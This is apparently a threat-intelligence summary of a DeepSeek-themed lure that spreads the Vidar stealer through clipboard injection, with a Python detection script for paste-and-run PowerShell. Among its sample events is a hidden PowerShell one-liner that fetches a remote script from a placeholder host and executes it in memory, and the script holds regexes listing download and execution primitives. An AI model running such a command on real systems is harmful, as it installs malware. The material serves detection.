DeepSeek Lure Used To Spread Malware
Essential information
- Published: 25/02/2025 19:40
- Modified: 26/02/2025 08:53
- Tags: 2025-02-25, brand impersonation, captcha, clipboard injection, cryptocurrency, deepseek, vidar
- Related entities: 40 observables, 12 techniques (MITRE), 1 malware
Description
Cybercriminals are exploiting DeepSeek's popularity by registering look-alike domains to deliver the Vidar information stealer. The attack chain starts with a deceptive website that prompts users to complete a fake partner registration, which leads to a malicious CAPTCHA page. That page writes a PowerShell command into the user's clipboard; when the user pastes and executes it, the command downloads and launches the Vidar malware. Vidar targets cryptocurrency wallets, browser data, and sensitive files, and uses Telegram and Steam for C2 communication. The campaign highlights how quickly threat actors exploit popular AI technologies and underlines the need for stronger security controls and user education.
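As an added defender-side example that is not part of this report, the following Python triage scores constructed process-creation events for the paste-and-run pattern described above: a shell launched interactively that fetches remote content and runs it in memory. Treating explorer.exe as the parent of a pasted command, the cmdlet list and the weights are assumptions; the domains are placeholders, not indicators from the report.

```python
import os
import re

# Constructed Sysmon Event ID 1 (process creation) records for illustration only;
# domains are placeholders, not indicators from the report.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://captcha.example.invalid/s.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iwr https://pkgs.example.invalid/tool.zip -OutFile tool.zip"'},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Indicators typical of a pasted one-liner: fetch, run in memory, hide the window.
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                      r"downloadfile|net\.webclient|start-bitstransfer|curl|certutil)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process|saps)\b", re.I)
HIDDEN = re.compile(r"-w[a-z]*\s+hid", re.I)                   # -w hidden / -WindowStyle Hidden
ENCODED = re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I)  # -enc <base64 blob>

def basename(path):
    return os.path.basename(path.replace("\\", "/")).lower()

def score_event(ev):
    """Return (score, reasons); score is 0 for anything that is not a shell launch."""
    if basename(ev["Image"]) not in SHELLS:
        return 0, []
    cmd = ev["CommandLine"]
    checks = [
        # Assumption: an explorer.exe parent means an interactive launch (e.g. a pasted command).
        (basename(ev["ParentImage"]) == "explorer.exe", 1, "interactive parent"),
        (bool(DOWNLOAD.search(cmd)), 2, "download primitive"),
        (bool(EXECUTE.search(cmd)), 1, "in-memory execution"),
        (bool(HIDDEN.search(cmd)), 1, "hidden window"),
        (bool(ENCODED.search(cmd)), 1, "encoded command"),
    ]
    hits = [(w, r) for ok, w, r in checks if ok]
    return sum(w for w, _ in hits), [r for _, r in hits]

def flag_paste_and_run(events, threshold=4):
    """Indices of events whose combined indicators reach the alert threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]

if __name__ == "__main__":
    for i in flag_paste_and_run(EVENTS):
        print(i, score_event(EVENTS[i]))
```

Only the first record reaches the threshold; the signed backup script and the developer's download from a code editor stay below it, which is the point of combining indicators rather than alerting on any single one.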